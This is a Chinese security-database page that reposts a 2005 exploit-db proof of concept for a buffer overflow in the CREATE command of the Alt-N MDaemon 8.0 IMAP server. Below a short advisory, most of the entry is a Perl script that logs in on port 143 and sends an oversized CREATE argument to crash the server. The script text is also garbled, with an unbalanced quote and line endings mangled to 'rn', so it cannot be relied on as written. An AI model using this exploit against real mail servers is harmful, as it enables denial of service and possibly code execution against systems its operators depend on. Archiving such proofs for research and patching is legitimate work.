Alt-N MDaemon 8.0 – IMAP Server CREATE Remote Buffer Overflow (PoC)

Alt-N MDaemon 8.0 – IMAP Server CREATE Remote Buffer Overflow (PoC)

漏洞ID 1055267 漏洞类型
发布时间 2005-07-19 更新时间 2005-07-19
图片[1]-Alt-N MDaemon 8.0 – IMAP Server CREATE Remote Buffer Overflow (PoC)-安全小百科CVE编号 N/A
图片[2]-Alt-N MDaemon 8.0 – IMAP Server CREATE Remote Buffer Overflow (PoC)-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/26005
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14315/info

Alt-N MDaemon IMAP Server is affected by a remote buffer overflow vulnerability.

This issue presents itself when an attacker submits excessive data through the CREATE command subsequent to authentication

This vulnerability may be leveraged to execute arbitrary code in the context of the server, facilitating unauthorized access to the affected computer.

Alt-N MDaemon 8.03 is reported to be vulnerable. Other versions are likely affected as well. 

### MDAEMON stack based buffer overflow
### Remote DoS exploit by kcope
use IO::Socket::INET;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                             PeerPort => '143',
                             Proto    => 'tcp');

$a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" x 10;

print $sock "a001 LOGIN username passwordrn";
print $sock "a001 CREATE $arn";

while (<$sock>) {
   print $_;
}

相关推荐: M-TECH P-Synch Cross-Site Scripting Vulnerability

M-TECH P-Synch Cross-Site Scripting Vulnerability 漏洞ID 1100214 漏洞类型 Input Validation Error 发布时间 2003-05-29 更新时间 2003-05-29 CVE编号 N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享